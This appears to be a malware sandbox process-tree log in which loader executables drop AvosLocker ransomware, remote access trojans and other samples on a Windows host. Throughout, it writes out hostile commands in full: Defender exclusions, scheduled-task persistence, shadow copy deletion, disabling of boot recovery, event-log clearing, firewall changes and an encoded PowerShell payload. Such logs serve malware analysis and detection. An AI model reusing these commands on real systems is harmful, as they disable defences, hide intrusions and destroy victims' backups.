C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"5⤵
- Executes dropped EXE
PID:816 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3124
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QaehznUmvunT.bat" "6⤵PID:3436
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:3368
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3376
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1960 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f8⤵PID:1928
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\WmRaNRGkeY5G.bat" "8⤵PID:3780
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:276
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3712
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"9⤵
- Suspicious use of SetWindowsHookEx
PID:3736 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:3692
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZdWKVGgJmxss.bat" "10⤵PID:3992
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:2124
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3436
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"11⤵PID:1692
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:1884
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\jlMhtqRNZLXh.bat" "12⤵PID:3480
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:3120
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3464
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"13⤵
- Suspicious use of SetWindowsHookEx
PID:3556 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
PID:2140
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\SSaKw3XxAHrV.bat" "14⤵PID:2220
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:1612
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2012
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"15⤵
- Suspicious use of SetWindowsHookEx
PID:4868 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
PID:5004
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1LN9bQFzMuxN.bat" "16⤵PID:4176
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:4316
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4332
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"17⤵
- Suspicious use of SetWindowsHookEx
PID:4300 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f18⤵PID:2972
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\svhpWV3BUr8D.bat" "18⤵PID:4256
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:4148
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4992
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"19⤵
- Suspicious use of SetWindowsHookEx
PID:3180 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f20⤵
- Scheduled Task/Job: Scheduled Task
PID:2996
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RCmVsD4r4cWD.bat" "20⤵PID:4868
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:4732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4388
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"21⤵PID:8124
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
PID:7344
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Gsk3bpDuvQYc.bat" "22⤵PID:6200
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:7368
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6304
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"23⤵PID:9552
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f24⤵PID:7792
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QZmdfgtz6Pq8.bat" "24⤵PID:7016
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:10672
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10660
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"25⤵PID:7412
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"2⤵PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wmfdist.exe"C:\Users\Admin\AppData\Local\Temp\Files\wmfdist.exe"2⤵PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"2⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵PID:4240
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"2⤵PID:6920
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:10360
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NJRAT%20DANGEROUS.exe"C:\Users\Admin\AppData\Local\Temp\Files\NJRAT%20DANGEROUS.exe"2⤵PID:10288
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\NJRAT%20DANGEROUS.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:13732
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SrbijaSetupHokej.exe"C:\Users\Admin\AppData\Local\Temp\Files\SrbijaSetupHokej.exe"2⤵PID:14272
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2448
-
C:\Users\Admin\AppData\Local\Temp\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Enigma32g.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Enigma32g.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:440
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\svchost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZQBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAZwBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcAB5ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Windows\Client.exe"C:\Windows\Client.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"' & exit4⤵PID:2628
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:2684
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp72B0.tmp.bat""4⤵PID:1460
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2864
-
-
C:\WIndows\svchost.exe"C:\WIndows\svchost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\AvosLocker.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\AvosLocker.exe"2⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
PID:5004 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive3⤵PID:4672
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive4⤵PID:5284
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet3⤵PID:3252
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:5964
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No3⤵PID:5104
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:5636
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:2956
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:6880
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵PID:4992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6576
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"3⤵
- Command and Scripting Interpreter: PowerShell
PID:6892 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1991753731.png /f4⤵PID:7276
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False4⤵PID:6212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\piotjhjadkaw.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\piotjhjadkaw.exe"2⤵PID:9096
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\RuntimeBroker.exe"2⤵PID:3660
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"3⤵PID:9980
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\V0vjHhTlZ9b9.bat" "4⤵PID:8084
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:6416
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7400
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"5⤵PID:10560
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Pd41ANksmeGU.bat" "6⤵PID:14936
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:12628
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12700
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"7⤵PID:13332
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\856.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\856.exe"2⤵PID:7924
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Files\856.exe" "856.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:15240
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Files\856.exe"3⤵
- Modifies Windows Firewall
PID:6156
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Files\856.exe" "856.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:1148
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"3⤵PID:8400
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9523⤵PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Client-built.exe"2⤵PID:7104
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f3⤵PID:7948
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\1SkillLauncher.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\1SkillLauncher.exe"2⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\EakLauncher_Update.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\EakLauncher_Update.exe"3⤵PID:9120
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\XClient.exe"2⤵PID:11216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:11336
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\joiner.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\joiner.exe"2⤵PID:4880
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\w.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\w.exe"2⤵
- Executes dropped EXE
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\c2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\c2.exe"2⤵PID:3508
-
C:\Windows\system32\notepad.exenotepad.exe3⤵PID:112
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\msedge.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\msedge.exe"2⤵PID:4996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:5008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4828
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\5dismhost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\5dismhost.exe"2⤵PID:10432
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\1.exe"2⤵PID:11220
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\1.exe"3⤵PID:8256
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\drop2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\drop2.exe"2⤵PID:4812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4224
-
-
C:\Windows\system32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:11380
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe3⤵PID:13400
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"3⤵PID:13444
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\krgawdtyjawd.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\krgawdtyjawd.exe"2⤵PID:3996
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0235A890-B1D6-4385-A36C-EF0E1321BD48} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Users\Admin\AppData\Roaming\boleto.exeC:\Users\Admin\AppData\Roaming\boleto.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe2⤵PID:2884
-
-
C:\Users\Admin\AppData\Roaming\boleto.exeC:\Users\Admin\AppData\Roaming\boleto.exe2⤵PID:2632
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵PID:3956
-
-
C:\Users\Admin\AppData\Local\Temp\requirements.exeC:\Users\Admin\AppData\Local\Temp\requirements.exe2⤵PID:1324
-
C:\Users\Admin\AppData\Local\Temp\requirements.exe.exe"C:\Users\Admin\AppData\Local\Temp\requirements.exe.exe"3⤵PID:2584
-
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:4476
-
-
-
C:\Users\Admin\AppData\Roaming\boleto.exeC:\Users\Admin\AppData\Roaming\boleto.exe2⤵PID:4380
-
C:\Users\Admin\AppData\Roaming\boleto.exe.exe"C:\Users\Admin\AppData\Roaming\boleto.exe.exe"3⤵PID:320
-
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:668
-
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵PID:3636
-
C:\Users\Admin\AppData\Roaming\XClient.exe.exe"C:\Users\Admin\AppData\Roaming\XClient.exe.exe"3⤵PID:3876
-
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:4292
-
-
-
C:\Program Files\msedge.exe"C:\Program Files\msedge.exe"2⤵PID:5896
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\Admin\AppData\Roaming\Runtime Broken Core.exe"3⤵PID:10452
-
-
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe2⤵PID:7656
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:8416
-
-
C:\ProgramData\dllhost.exe.exe"C:\ProgramData\dllhost.exe.exe"3⤵PID:9276
-
-
-
C:\Users\Admin\AppData\Roaming\boleto.exeC:\Users\Admin\AppData\Roaming\boleto.exe2⤵PID:7892
-
C:\Users\Admin\AppData\Roaming\boleto.exe.exe"C:\Users\Admin\AppData\Roaming\boleto.exe.exe"3⤵PID:9596
-
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\requirements.exeC:\Users\Admin\AppData\Local\Temp\requirements.exe2⤵PID:7380
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:4976
-
-
C:\Users\Admin\AppData\Local\Temp\requirements.exe.exe"C:\Users\Admin\AppData\Local\Temp\requirements.exe.exe"3⤵PID:5764
-
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵PID:6708
-
C:\Users\Admin\AppData\Roaming\XClient.exe.exe"C:\Users\Admin\AppData\Roaming\XClient.exe.exe"3⤵PID:10892
-
-
C:\Componentperf\Onedrive.exe"C:\Componentperf\Onedrive.exe"3⤵PID:4332
-
-
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe2⤵PID:6732
-
-
C:\Users\Admin\AppData\Local\Temp\requirements.exeC:\Users\Admin\AppData\Local\Temp\requirements.exe2⤵PID:9628
-
-
C:\Users\Admin\AppData\Roaming\boleto.exeC:\Users\Admin\AppData\Roaming\boleto.exe2⤵PID:9124
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵PID:8444
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\boleto.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\boleto.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\boleto.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"3⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Excel-https.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Excel-https.exe"2⤵
- Executes dropped EXE
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\CFXBypass.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\CFXBypass.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1404 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\CFXBypass.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\CFXBypass.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2092
-
-
-
